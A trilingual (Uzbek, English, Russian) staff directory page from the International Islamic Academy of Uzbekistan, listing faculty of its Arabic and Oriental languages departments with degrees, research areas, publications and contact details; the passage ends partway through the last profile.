600

“Arab tili va adabiyoti Al-Azhar” kafedrasi

O‘zbekiston xalqaro islom akademiyasining “Mumtoz sharq filologiyasi” fakulteti tarkibida bo‘lgan “Arab tili va adabiyoti Al-Azhar” kafedrasi 2019-yil 1-mayda  “Sharq filologiyasi” kafedrasi negizida tashkil etilgan bo‘lib, o‘ttiz nafar talaba bu maskanda tahsil oladi. Arab tili va adabiyoti bo‘yicha mutaxassis bo‘lib yetishishi kutilayotgan bo‘lajak kadrlar, O‘zbekiston Respublikasi Tashqi ishlar vazirligi, O‘zbekiston Respublikasi Xalq ta’limi vazirligi, O‘zbekiston Respublikasi Oliy va o‘rta maxsus ta’lim vazirligi, O‘zbekiston Respublikasi Fanlar Akademiyasi Abu Rayhon Beruniy nomidagi Sharqshunoslik instituti, O‘zbekiston Respublikasi Fanlar Akademiyasining Alisher Navoiy nomidagi Davlat Adabiyot muzeyi, O‘zbekistondagi islom sivilizatsiyasi markazi, Imom Buxoriy xalqaro ilmiy-tadqiqot markazi, Imom Termiziy xalqaro ilmiy-tadqiqot markazi, Hadis ilmi maktabi, Respublikadagi o‘rta-maxsus islom bilim yurtlari hamda oliy ta’lim muassasalarida xizmat qiladilar.

O‘ZBEK TILIDA

F.I.SH.: Aripova Zuxra Djaxangirovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi mudiri

Ilmiy darajasi: tarix fanlari doktori (DSc)

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari:  arab tili va adabiyoti, arab mamlakatlari tarixi, islom tarixi va manbashunosligi, xalqaro munosabatlar.

Chet tillarni bilishi: arab, rus va ingliz tillari

Asosiy ilmiy ishlari:

– Arab tilidan boshlang‘ich kurslar uchun fonetik diktant to‘plami – T.: “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011. 40b. (hammualliflikda)

  – Arab tilidan klassik matnlar. O‘quv-uslubiy qo‘llanma – T. : “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011. – 64 b.

– Informatika va axborot texnologiyalari yo‘nalishi talabalariga arab tilidan o‘quv-uslubiy qo‘llanma. – T.: “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2012. – 72 b.;

– Psixologiya yo‘nalishi talabalariga arab tilini o‘qitish bo‘yicha o‘quv qo‘llanma. Toshkent: TIU nashriyot-matbaa birlashmasi. 2015

– Sharq tillari (arab) o‘quv qo‘llanma. “Tafakkur bo‘stoni”, 2018 yil, Toshkent.-256b.

– Mamluk sultonlari hukmronligi davrida Misr (1250-1517) monogafiya. T.:Navro‘z nashriyoti, 2019, 172 b.

 Asosiy chet tili(arab). (1 kurs uchun)// Darslik – T.: Zamon poligraf, 2020. – 258 b. (hammualliflikda)

 Asosiy chet tili(arab). (2 kurs uchun)// Darslik – T.: Zamon poligraf, 2021. – 262 b. (hammualliflikda)

– Mamluk sultonlari davlat boshqaruvida Abbosiy xalifalarning o‘rni, monografiya. – Toshkent: «Lesson press» nashriyoti, 2021. 150 b.

– Sohaga oid arab tili (AXB yo‘nalishi uchun)// O‘quv qo‘llanma. – T.: Zamon poligraf, 2022.

– Sohaga oid arab tili (AXB yo‘nalishi uchun)// Darslik. – T.: Zamon poligraf, 2023.

Ilmiy ishlari havolasi: -----

Elektron manzili: aripova.zuxra@mail.ru

telefon raqami: +998903224546 

INGLIZ TILIDA

Full Name: Aripova Zukhra Djaxangirovna

Workplace: Head of the Department "Uzbek Language and Classical Oriental Literature", Doctor of History (DSc), Associate Professor

Academic degree: Doctor of History (DSc)

Academic title: dotsent

Research fields: Arabic language and literature, history of Arab countries, Islamic history and source studies, international relations.

Foreign language skills: Arabik, Russian and English

Main scientific works:

– Arab tilidan boshlang‘ich kurslar uchun fonetik diktant to‘plami – T.: “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011.(hammualliflikda) (In Uzbek)

  – Arab tilidan klassik matnlar. O‘quv-uslubiy qo‘llanma – T. : “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011. – 64 b. (In Uzbek)

– Informatika va axborot texnologiyalari yo‘nalishi talabalariga arab tilidan o‘quv-uslubiy qo‘llanma. – T. : “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2012. – 72 b.; (In Uzbek)

–Psixilogiya yo‘nalishi talabalariga arab tilini o‘qitish bo‘yicha o‘quv qo‘llanma. Toshkent: TIU nashriyot-matbaa birlashmasi. 2015 (In Uzbek)

– Sharq tillari (arab) o‘quv qo‘llanma. “Tafakkur bo‘stoni”, 2018 yil, Toshkent.-256b. (In Uzbek)

–  Mamluk sultonlari hukmronligi davrida Misr (1250-1517) monogafiya. T.:Navro‘z nashriyoti, 2019, 172 b. (In Uzbek)

 Asosiy chet tili(arab). (1 kurs uchun)// Darslik – T.: Zamon poligraf, 2020. – 258 b. (hammualliflikda) (In Uzbek)

 Asosiy chet tili(arab). (2 kurs uchun)// Darslik – T.: Zamon poligraf, 2021. – 262 b. (hammualliflikda) (In Uzbek)

– Mamluk sultonlari davlat boshqaruvida Abbosiy xalifalarning o‘rni, monografiya. – Toshkent: «Lesson press» nashriyoti, 2021. 150 b. (In Uzbek)

  Sohaga oid arab tili (AXB yo‘nalishi uchun)// O‘quv qo‘llanma. – T.: Zamon poligraf, 2022. (In Uzbek)

–Sohaga oid arab tili (AXB yo‘nalishi uchun)// Darslik. – T.: Zamon poligraf, 2023. (In Uzbek)

Scientific works link: -----

Email address: aripova.zuxra@mail.ru

phone number: +998903224546

RUS TILIDA

ФИО: Арипова Зухра Джахангировна

Место работы: Заведующий кафедрой узбекского языка и классической восточной литературы Международной исламской академии Узбекистана

Ученая степень: доктор исторических наук (DSc)

Ученое звание:  доцент

Области научных исследований: Арабский язык и литература, история арабских стран, исламская история и источниковедение, международные отношения.

Знание иностранных языков: арабский, русский и английский языки

Основные научные труды:

– Араб тилидан бошланғич курслар учун фонетик диктант тўплами – Т.: “Тошкент ислом университети” нашриёт-матбаа бирлашмаси, 2011. – 40б.;

– Араб тилидан классик матнлар. Ўқув-услубий қўлланма – Т.: “Тошкент ислом университети” нашриёт-матбаа бирлашмаси, 2011. – 64 б.

– “Информатика ва ахборот технологиялари” йўналиши талабаларига араб тилидан ўқув-услубий қўлланма. – Т.: “Тошкент ислом университети” нашриёт-матбаа бирлашмаси, 2012. – 72 б.;

– Психoлогия йўналиши талабаларига араб тилини ўқитиш бўйича ўқув қўлланма. Тошкент: ТИУ нашриёт-матбаа бирлашмаси. 2015

– Шарқ тиллари (араб) ўқув қўлланма. “Тафаккур бўстони”, 2018 йил, Тошкент.-256 б.

–Мамлук султонлари ҳукмронлиги даврида Миср (1250-1517). моногафия. Т.:Наврўз нашриёти, 2019, 172 б.

 –Асосий чет тили(араб). (1 курс учун)// Дарслик – Т.: Zamon poligraf, 2020. – 258 б. (ҳаммуаллифликда)

– Асосий чет тили(араб). (2 курс учун)// Дарслик – Т.: Zamon poligraf, 2021. – 262 б. (ҳаммуаллифликда)

–Мамлук султонлари давлат бошқарувида Аббосий халифаларнинг ўрни, монография. – Тошкент: «Lesson press» нашриёти, 2021. 150 б.

– Соҳага оид араб тили (АХБ йўналиши учун)// Ўқув қўлланма. – Т.: Zamon poligraf, 2022.

–Марказий Осиё анъаналарининг Миср ижтимоий ҳаётига таъсири (1250-1517), монография. – Тошкент, «Bookmany print» нашриёти, 2022. бет. 162 б.

–Соҳага оид араб тили (АХБ йўналиши учун)// Дарслик. – Т.: Zamon poligraf, 2023.

Ссылка на научные работы: -----

Адрес электронной почты: aripova.zuxra@mail.ru

Сотовый телефон: +998 90 322 45 46

O‘ZBEK TILI

F.I.SH.: Akmalxanov Akmalxon Ahmad o‘g‘li

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi katta o‘qituvchisi.

Ilmiy darajasi: filologiya fanlari bo‘yicha falsafa doktori, PhD

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: Lingvistika

Chet tillarni bilishi: arab, ingliz tillari

Asosiy ilmiy ishlari: 

 • Abu Ya’qub Sakkokiy ishtiqoq san’ati haqida. ToshDSHI “Sharq mash’ali”, 4/2018. 37-44- betlar.
 • Arab tilshunosligi tarixida so‘z yasalishi haqidagi qarashlar. ToshDSHI “Sharqshunoslik”, 4/2018. 124-132 betlar.
 • Abu Ya’qub Sakkokiyning “ziyoda” harf o‘rinlari haqidagi qarashlari. UrDU “Ilm sarchashmalari”. 6/2019. 110-114 betlar.
 • Abu Ya’qub Sakkokiy “lām”, “mīm”, “vāv” harflarning  so‘zdagi o‘rni haqidagi qarashlari. O‘zDJTU. “O‘zbekistonda xorijiy tillar”. 2/2019. 30-37 betlar

Ilmiy ishlari havolasi: 

https://journal.fledu.uz/uz/author/akmalhon-akmalhonov/

https://journal.fledu.uz/uz/abu-ya%d2%9bub-sakkokij-lam-mim-vav-%d2%b3arflarning-s%d1%9ezdagi-%d1%9erni-%d2%b3a%d2%9bidagi-%d2%9barashlari/

https://scholarzest.com/index.php/esj/article/view/594

https://interonconf.org/index.php/ger/user/setLocale/ru_RU?source=%2Findex.php%2Fger%2Farticle%2Fview%2F3414

https://internationaljournals.co.in/index.php/giirj/article/view/27

https://hozir.org/arab-tilida-kelishik-kategoriyasi-haqidagi-qarashlar.html

Elektron manzili: akmalxonovibnahmad.@gmail.com

Ishxona telefon raqami: +998 71 244 95 98

INGLIZ TILIDA

Full Name: Akmalxanov Akmalxon Ahmad o‘g‘li

Academic degree: Doctor of Philosophy in Filology Sciences

Academic title: -

Research fields: Linguistics

Foreign language skills: Arabic, English languages

Main scientific works: 

 • Abu Ya’qub Sakkokiy ishtiqoq san’ati haqida. ToshDSHI “Sharq mash’ali”, 4/2018. 37-44- betlar.
 • Arab tilshunosligi tarixida so‘z yasalishi haqidagi qarashlar. ToshDSHI “Sharqshunoslik”, 4/2018. 124-132 betlar.
 • Abu Ya’qub Sakkokiyning “ziyoda” harf o‘rinlari haqidagi qarashlari. UrDU “Ilm sarchashmalari”. 6/2019. 110-114 betlar.
 • Abu Ya’qub Sakkokiy “lām”, “mīm”, “vāv” harflarning  so‘zdagi o‘rni haqidagi qarashlari. O‘zDJTU. “O‘zbekistonda xorijiy tillar”. 2/2019. 30-37 betlar.

Scientific works link: 

https://journal.fledu.uz/uz/author/akmalhon-akmalhonov/

https://journal.fledu.uz/uz/abu-ya%d2%9bub-sakkokij-lam-mim-vav-%d2%b3arflarning-s%d1%9ezdagi-%d1%9erni-%d2%b3a%d2%9bidagi-%d2%9barashlari/

https://scholarzest.com/index.php/esj/article/view/594

https://interonconf.org/index.php/ger/user/setLocale/ru_RU?source=%2Findex.php%2Fger%2Farticle%2Fview%2F3414

https://internationaljournals.co.in/index.php/giirj/article/view/27

https://hozir.org/arab-tilida-kelishik-kategoriyasi-haqidagi-qarashlar.html

Email address: akmalxonovibnahmad.@gmail.com 

Office phone number: +998 71 244 95 98

RUS TILIDA

ФИО: Акмалханов Акмалхон Ахмад угли

Ученая степень: доктор философии по филологическим наукам (PhD)

Ученое звание: -

Области научных исследований: Лингвистика

Знание иностранных языков: араб и английский языки

Основные научные труды: 

 • Абу Яъқуб Саккокий иштиқоқ санъати ҳақида. ТошДШИ “Шарқ машъали”, 4/2018. 37-44- бетлар.
 • Араб тилшунослиги тарихида сўз ясалиши ҳақидаги қарашлар. ТошДШИ “Шарқшунослик”, 4/2018. 124-132 бетлар.
 • Абу Яъқуб Саккокийнинг “зиёда” ҳарф ўринлари ҳақидаги қарашлари. УрДУ “Илм сарчашмалари”. 6/2019. 110-114 бетлар.
 • Абу Яъқуб Саккокий “лāм”, “мīм”, “вāв” ҳарфларнинг сўздаги ўрни ҳақидаги қарашлари. ЎзДЖТУ. “Ўзбекистонда хорижий тиллар”. 2/2019. 30-37 бетлар.

Ссылка на научные работы:

https://journal.fledu.uz/uz/author/akmalhon-akmalhonov/

https://journal.fledu.uz/uz/abu-ya%d2%9bub-sakkokij-lam-mim-vav-%d2%b3arflarning-s%d1%9ezdagi-%d1%9erni-%d2%b3a%d2%9bidagi-%d2%9barashlari/

https://scholarzest.com/index.php/esj/article/view/594

https://interonconf.org/index.php/ger/user/setLocale/ru_RU?source=%2Findex.php%2Fger%2Farticle%2Fview%2F3414

https://internationaljournals.co.in/index.php/giirj/article/view/27

https://hozir.org/arab-tilida-kelishik-kategoriyasi-haqidagi-qarashlar.html

Адрес электронной почты: akmalxonovibnahmad.@gmail.com 

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

F.I.SH.: Shoaliyeva Nargiza Kaxramanovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi dosenti. 

Ilmiy darajasi: -Filologiya fanlari nomzodi

Ilmiy unvoni: -dotsent

Ilmiy tadqiqot yo‘nalishlari: filologiya, sharq adabiyoti

Chet tillarni bilishi: Fors, rus va ingliz tillari

Asosiy ilmiy ishlari: 

 • SUHROB SIPEHRIY VA UNING DINIY, BADIIY-IRFONIY TAFAKKURI \\ Monografiya. 2022, OʻzXIA nashri,170 bet 
 • Fors she`riyatida rind timsoli. Monografiya. 2023, ЎзХИА нашри,102 bet
 • Fors tili. Ўқув қўлланма. 2019 йил. 267бет.
 • Персидский язык. Учебное пособие. Изд. МИАУ. 2023. 187стр.
 • Fors tili. O`quv qo`llanma. UzXIA 2021. 250bet. 

Ilmiy ishlari havolasi: 

 https://scholar.google.com/citations?user=uMqByFwAAAAJ&hl=ru

https://scholar.google.com/citations?view_op=view_citation&hl=ru&user=uMqByFwAAAAJ&citation_for_view=uMqByFwAAAAJ:roLk4NBRz8UC

https://scholar.google.com/citations?view_op=view_citation&hl=ru&user=uMqByFwAAAAJ&citation_for_view=uMqByFwAAAAJ:qjMakFHDy7sC 

https://scholar.google.com/citations?view_op=view_citation&hl=ru&user=uMqByFwAAAAJ&citation_for_view=uMqByFwAAAAJ:Tyk-4Ss8FVUC 

https://scholar.google.com/citations?view_op=view_citation&hl=ru&user=uMqByFwAAAAJ&citation_for_view=uMqByFwAAAAJ:Se3iqnhoufwC

Elektron manzili: nshoaliyeva74@mail.ru 

Ishxona telefon raqami: +998 71 244 95 98

INGLIZ TILIDA

Full Name: Shoaliyeva Nargiza Kaxramanovna

Academic degree: -Associate Professor of the Department of "Uzbek Language and Classical Eastern Literature" of the International Islamic Academy of Uzbekistan.

Academic title: -Candidate of philological sciences

Research fields: philology, oriental literature 

Foreign language skills: Farsi, Russian and English languages

Main scientific works: 

 • SUHROB SIPEHRIY VA UNING DINIY, BADIIY-IRFONIY TAFAKKURI \\ Monografiya. 2022, OʻzXIA nashri,170 bet 
 • Fors she`riyatida rind timsoli. Monografiya. 2023, ЎзХИА нашри,102 bet
 • Fors tili. Ўқув қўлланма. 2019 йил. 267бет.
 • Персидский язык. Учебное пособие. Изд. МИАУ. 2023. 187стр.
 • Fors tili. O`quv qo`llanma. UzXIA 2021. 250bet. 

Scientific works link: 

 https://scholar.google.com/citations?user=uMqByFwAAAAJ&hl=ru

Email address: nshoaliyeva74@mail.ru 

Office phone number: +998 71 244 95 98

RUS TILIDA

ФИО: Шоалиева Наргиза Кахрамановна

Ученая степень: - кандидат филологических наук

Ученое звание: -доцент

Области научных исследований: филология, восточная литература

Знание иностранных языков: фарси, русский и английский языки

Основные научные труды: 

 • SUHROB SIPEHRIY VA UNING DINIY, BADIIY-IRFONIY TAFAKKURI \\ Monografiya. 2022, OʻzXIA nashri,170 bet 
 • Fors she`riyatida rind timsoli. Monografiya. 2023, ЎзХИА нашри,102 bet
 • Fors tili. Ўқув қўлланма. 2019 йил. 267бет.
 • Персидский язык. Учебное пособие. Изд. МИАУ. 2023. 187стр.
 • Fors tili. O`quv qo`llanma. UzXIA 2021. 250bet. 

Ссылка на научные работы:

 https://scholar.google.com/citations?user=uMqByFwAAAAJ&hl=ru

Адрес электронной почты: nshoaliyeva74@mail.ru 

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

F.I.SH.: Arifdjanov Zokir Toxirovich

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi katta o‘qituvchisi. 

Ilmiy darajasi: -

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: Lingvistika

Chet tillarni bilishi: Fors, rus va ingliz tillari

Asosiy ilmiy ishlari: 

 • Тилшуносликда вариантлилик ҳодисаси. “ЎзМУ хабарлари”. Тошкент, 2015. //– № 1/6 
 • خواستن [xāstan] феъли функционал эквивалентлари. “Шарқшунослик”. Тошкент, 2015. //– № 4 
 • Форс тилида феълларнинг лексик-семантик вариантлашуви. “Шарқ машъали”. Тошкент, 2018. //– № 1 
 • خواستن [xāstan] sodda fe’lining funksional ekvivalentlari va ularning formal invariantlari. Islom ziyosi. Toshkent, 2020. //– №1. 

Ilmiy ishlari havolasi: 

 https://uzjournals.edu.uz/iiau/vol2020/iss1/23/

https://uzjournals.edu.uz/iiau/vol2020/iss2/10

http://t-science.org/arxivDOI/2020/07-87.html

http://t-science.org/arxivDOI/2021/06-98.html

https://internauka.org/journal/science/internauka/242

https://doi.org/10.5281/zenodo.7625976

Elektron manzili: nshoaliyeva74@mail.ru 

Ishxona telefon raqami: +998 71 244 95 98

INGLIZ TILIDA

Full Name: Arifdjanov Zokir Toxirovich

Academic degree: -

Academic title: -

Research fields: Linguistics

Foreign language skills: Farsi, Russian and English languages

Main scientific works: 

 • Тилшуносликда вариантлилик ҳодисаси. “ЎзМУ хабарлари”. Тошкент, 2015. //– № 1/6  (in Uzbek)
 • خواستن [xāstan] феъли функционал эквивалентлари. “Шарқшунослик”. Тошкент, 2015. //– № 4 (in Uzbek)
 • Форс тилида феълларнинг лексик-семантик вариантлашуви. “Шарқ машъали”. Тошкент, 2018. //– № 1 (in Uzbek)
 • خواستن [xāstan] sodda fe’lining funksional ekvivalentlari va ularning formal invariantlari. Islom ziyosi. Toshkent, 2020. //– №1. (in Uzbek)

Scientific works link: 

https://uzjournals.edu.uz/iiau/vol2020/iss1/23/

https://uzjournals.edu.uz/iiau/vol2020/iss2/10

http://t-science.org/arxivDOI/2020/07-87.html

http://t-science.org/arxivDOI/2021/06-98.html

https://internauka.org/journal/science/internauka/242

https://doi.org/10.5281/zenodo.7625976

Email address: zokirarifdjanov@gmail.com 

Office phone number: +998 71 244 95 98

RUS TILIDA

ФИО: Арифджанов Зокир Тохирович

Ученая степень: -

Ученое звание: -

Области научных исследований: Лингвистика

Знание иностранных языков: фарси, русский и английский языки

Основные научные труды: 

 • Тилшуносликда вариантлилик ҳодисаси. “ЎзМУ хабарлари”. Тошкент, 2015. //– № 1/6
 • خواستن [xāstan] феъли функционал эквивалентлари. “Шарқшунослик”. Тошкент, 2015. //– № 4
 • Форс тилида феълларнинг лексик-семантик вариантлашуви. “Шарқ машъали”. Тошкент, 2018. //– № 1
 • خواستن [xāstan] sodda fe’lining funksional ekvivalentlari va ularning formal invariantlari. Islom ziyosi. Toshkent, 2020. //– №1. 

Ссылка на научные работы:

https://uzjournals.edu.uz/iiau/vol2020/iss1/23/

https://uzjournals.edu.uz/iiau/vol2020/iss2/10

http://t-science.org/arxivDOI/2020/07-87.html

http://t-science.org/arxivDOI/2021/06-98.html

https://internauka.org/journal/science/internauka/242

https://doi.org/10.5281/zenodo.7625976

Адрес электронной почты: zokirarifdjanov@gmail.com 

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

 F.I.SH.: Nizamova Feruza Alimullaevna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi dotsenti.

Ilmiy darajasi: - filologiya fanlari nomzodi 

Ilmiy unvoni: - dotsent.

Ilmiy tadqiqot yo‘nalishlari: Sharqshunos-filolog

Chet tillarni bilishi: Fors, rus va ingliz tillari

Asosiy ilmiy ishlari: 

 • “Fors tili” fanidan o‘quv qo‘llanmasi. – Toshkent: TIU nashriyot-matbaa birlashmasi, 2016.  – 10 b.t. 140-bet.
 • Amir Xusrav Dehlaviy ijodida ruboiy janri. Monografiya. –T., Navro‘z,  2019. -224 (14 b.t.)
 • Fors tili: mustaqil ta’lim uchun: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2019.  –48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma. –Toshkent: Navro‘z, 2019. –136 b.
 •  Fors tili: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2021.  – 48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma.  – Toshkent, Complex Print, 2021. – 132 b.
 • Fors tili: darslik. – Toshkent, Zamon polighaf, 2023. – 234 b. (hammualliflikda)

Ilmiy ishlari havolasi:

https://scholar.google.com/citations?user=xEv25y0AAAAJ&hl=ru

Elektron manzili: feruzanizom1975@gmail.com

Ishxona telefon raqami: +998 71 244 95 98 

INGLIZ TILIDA

 Full Name: Nizamova Feruza Alimullaevna

Academic degree: - Associate Professor of the Department of "Uzbek Language and Classical Eastern Literature" of the International Islamic Academy of Uzbekistan.

Academic title: - Candidate of philological sciences

Research fields: Orientalist-philologist

Foreign language skills: Farsi, Russian and English languages

Main scientific works: 

 • “Fors tili” fanidan o‘quv qo‘llanmasi. – Toshkent: TIU nashriyot-matbaa birlashmasi, 2016.  – 10 b.t. 140-bet.
 • Amir Xusrav Dehlaviy ijodida ruboiy janri. Monografiya. –T., Navro‘z,  2019. -224 (14 b.t.)
 • Fors tili: mustaqil ta’lim uchun: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2019.  –48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma. –Toshkent: Navro‘z, 2019. –136 b.
 •  Fors tili: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2021. – 48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma.  – Toshkent, Complex Print, 2021. – 132 b.
 • Fors tili: darslik.  – Toshkent, Zamon polighaf, 2023. – 234 b. (hammualliflikda)

Scientific works link: 

https://scholar.google.com/citations?user=xEv25y0AAAAJ&hl=ru

Email address: feruzanizom1975@gmail.com 

Office phone number: +998 71 244 95 98 

RUS TILIDA

 ФИО: Низамова Феруза Алимуллаевна

Ученая степень: - кандидат филологических наук

Ученое звание: - доцент

Области научных исследований: Востоковед-филолог

Знание иностранных языков: фарси, русский и английские языки

Основные научные труды: 

 • “Fors tili” fanidan o‘quv qo‘llanmasi. – Toshkent: TIU nashriyot-matbaa birlashmasi, 2016.  – 10 b.t. 140-bet.
 • Amir Xusrav Dehlaviy ijodida ruboiy janri. Monografiya. –T., Navro‘z,  2019. -224 (14 b.t.)
 • Fors tili: mustaqil ta’lim uchun: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2019.  –48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma. –Toshkent: Navro‘z, 2019. –136 b.
 •  Fors tili: o‘quv qo‘llanma. –Toshkent: O‘zbekiston xalqaro islom akademiyasi, 2021. – 48 b. – 3 b.t.
 • Fors tili: o‘quv qo‘llanma.  – Toshkent, Complex Print, 2021. – 132 b.
 • Fors tili: darslik.  – Toshkent, Zamon polighaf, 2023. – 234 b. (hammualliflikda)

Ссылка на научные работы:

https://scholar.google.com/citations?user=xEv25y0AAAAJ&hl=ru

Адрес электронной почты: feruzanizom1975@gmail.com 

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

 F.I.Sh.: Sayidiraximova Nasiba Sayidmaxamadovna.

Ish joyi: O‘zbekiston xalqaro islom akademiyasi O‘zbek tili va mumtoz sharq adabiyoti kafedrasi.

Ilmiy darajasi: filologiya fanlari nomzodi.

Ilmiy unvoni: dotsent.

Ilmiy tadqiqot yo‘nalishlari: psixolingvistika, cognitiv tilshunoslik, neyrolingvistika.

Chet tillarni bilishi: rus tili va ingliz tili lug‘at yordamida.

Asosiy ilmiy ishlari: 

– Maktabgacha yoshdagi o‘zbek bolalar nutqining lingvistik tadqiqi. Filol.fan.nom. diss...-Toshkent, 2004; 

– Bolalar nutqining psixolingvistik xususiyatlari. Monografiya. -Toshkent: TDPU, 2012. -B. 116;

– “Hozirgi o‘zbek adabiy tili”. Fonetika. Fonologiya. Orfografiya. (Laboratoriya ishlari) / 5111200-O‘zbek tili va adabiyoti ta’lim yo‘nalishi uchun. O‘quv qo‘llanma.  -Toshkent: TDPU, 2016;

– “Hozirgi o‘zbek adabiy тili” Leksikologiya. Frazeologiya. Leksikografiya. 5111200-O‘zbek tili va adabiyoti ta’lim yo‘nalishi uchun. Uslubiy qoʻllanma.                        -Toshkent: TDPU, 2016;

–  Audiokitob (M.Qurbonovaning “O‘zbek  tili va adabiyoti mutaxassisligi bo‘yicha magistrlik dissertatsiyasini yozishga qo‘yiladigan talablar” nomli uslubiy ko‘rsatmasi asosida).  –Toshkent: Afruz rekord ovoz yozish studiyasi, 2015. 140 mb. (hammualliflikda); 

–  “Hozirgi o‘zbek adabiy тili” Morfemika. So‘z yasalishi. Morfologiya. (Laboratoriya ishlari) / 5111200-O‘zbek tili va adabiyoti ta’lim yo‘nalishi uchun. Uslubiy qo‘llanma. -Toshkent: TDPU, 2016; 

–  “Hozirgi  o‘zbek adabiy tili”. Fonetika. Fonologiya. Orfografiya. 5120100- Filologiya va tillarni o‘qitish (o‘zbek tili) ta’lim yo‘nalishi uchun (Amaliy ishlar). Oʻquv-uslubiy qoʻllanma. -Toshkent: TDPU, 2018; 

– “Hozirgi o‘zbek adabiy тili” Leksikologiya. Frazeologiya. Leksikografiya. 5120100-Filologiya va tillarni o‘qitish (o‘zbek tili) ta’lim yo‘nalishi uchun. - Oʻquv-uslubiy qoʻllanma. -Toshkent: TDPU, 2018; 

–  “Hozirgi o‘zbek adabiy тili” Leksikologiya. Frazeologiya. Leksikografiya. 5120100- Filologiya va tillarni o‘qitish (o‘zbek tili) ta’lim yo‘nalishi uchun (Amaliy ishlar). Oʻquv-uslubiy qoʻllanma. -Toshkent: TDPU, 2018; 

-  Mutaxassislikka kirish  fanidan mustaqil ta’limni tashkil etish bo‘yicha uslubiy ko‘rsatmalar. Uslubiy qo‘llanma. –Toshkent: TDO‘TAU, 2018.

-O‘zbek tilining sohada qo‘llanilishi. (Bakalavr bosqichi, 5210200-Psixologiya Din sotsiopsixologiyasi ta’lim yo‘nalishi talabalari uchun). Darslik. -Toshkent: Zamon Poligraf, 2022.

-O‘zbek tilining sohada qo‘llanilishi. (Bakalavr bosqichi, 60220200-Islomshunoslik ta’lim yo‘nalishi talabalari uchun). Darslik. -Toshkent: Zamon Poligraf, 2023.

-Maktabgacha o‘zbek bolalar nutqining lingvistik xususiyatlari. Monografiya. -Toshkent: Zamon Poligraf, 2023.

Ilmiy ishlari havolasi: https://scholar.google.com/citations?user=Tb5BzhIAAAAJ&hl=ru

Elektron manzili: nasibatashkent@mail.ru

Ishxona telefon raqami: +998 71 244 95 98 

INGLIZ TILIDA

 Full Name: Sayidiraximova Nasiba Sayidmaxamadovna.

Academic degree: Department of Uzbek language and classical oriental literature of the International Islamic Academy of Uzbekistan.

Academic degree: candidate of philological sciences.

Scientific title: associate professor.

Research fields: international relations, foreign policy and diplomacy, political science, world politics, political processes in Central Asia, youth policy

Foreign language skills: Russian and English.

Main scientific works: 

- Linguistic study of Uzbek children's speech of preschool age. Philol. science. nom. diss...-Tashkent, 2004;

- Psycholinguistic features of children's speech. Monograph. -Tashkent: TDPU, 2012. -B. 116;

- "Current Uzbek literary language". Phonetics. Phonology. Orthography. (Laboratory work) / 5111200-Uzbek language and literature for the field of education. Study guide. -Tashkent: TDPU, 2016;

- "Current Uzbek literary language" Lexicology. Phraseology. Lexicography. 5111200-Uzbek language and literature for education. A methodological guide. -Tashkent: TDPU, 2016;

- Audiobook (based on the methodical instructions of M. Qurbanova entitled "Requirements for writing a master's thesis on the specialty of Uzbek language and literature"). -Tashkent: Afruz recording studio, 2015. 140 mb. (in co-authorship);

- "Current Uzbek literary language" Morphemics. Word formation. Morphology. (Laboratory work) / 5111200-Uzbek language and literature for the field of education. Methodical guide. -Tashkent: TDPU, 2016;

- "Current Uzbek literary language". Phonetics. Phonology. Orthography. 5120100- Philology and language teaching (Uzbek language) for the field of education (Practical works). Instructional manual. -Tashkent: TDPU, 2018;

-"Current Uzbek literary language" Lexicology. Phraseology. Lexicography. 5120100-Philology and language teaching (Uzbek language) for the field of education. - Instructional manual. -Tashkent: TDPU, 2018;

- "Current Uzbek literary language" Lexicology. Phraseology. Lexicography. 5120100- Philology and language teaching (Uzbek language) for the field of education (Practical works). Instructional manual. -Tashkent: TDPU, 2018;

- Methodological instructions for organizing independent education in the subject of entry to the specialty. Methodical guide. -Tashkent: TDO'TAU, 2018.

- The use of the Uzbek language in the field. (Bachelor's level, 5210200-Psychology for students of sociopsychology of religion). Textbook. -Tashkent: Zaman Poligraf, 2022.

- The use of the Uzbek language in the field. (Bachelor's level, for students of 60220200-Islamic studies). Textbook. -Tashkent: Zaman Poligraf, 2023.

- Linguistic features of preschool Uzbek children's speech. Monograph. -Tashkent: Zaman Poligraf, 2023.

  Research papers link:

 https://scholar.google.com/citations?user=Tb5BzhIAAAAJ&hl=ru

Email address: nasibatashkent@mail.ru 

Office phone number: +998 71 244 95 98 

RUS TILIDA

 ФИО: Сайидирахимова Насиба Сайидмахамадовна

Ученая степень: кандитат филологических наук.

Ученое звание: доцент.

Области научных исследований: психолингвистика, когнитивная лингвистика, нейролингвистика.

Знание иностранных языков: русский и английский языки.

Основные научные труды: 

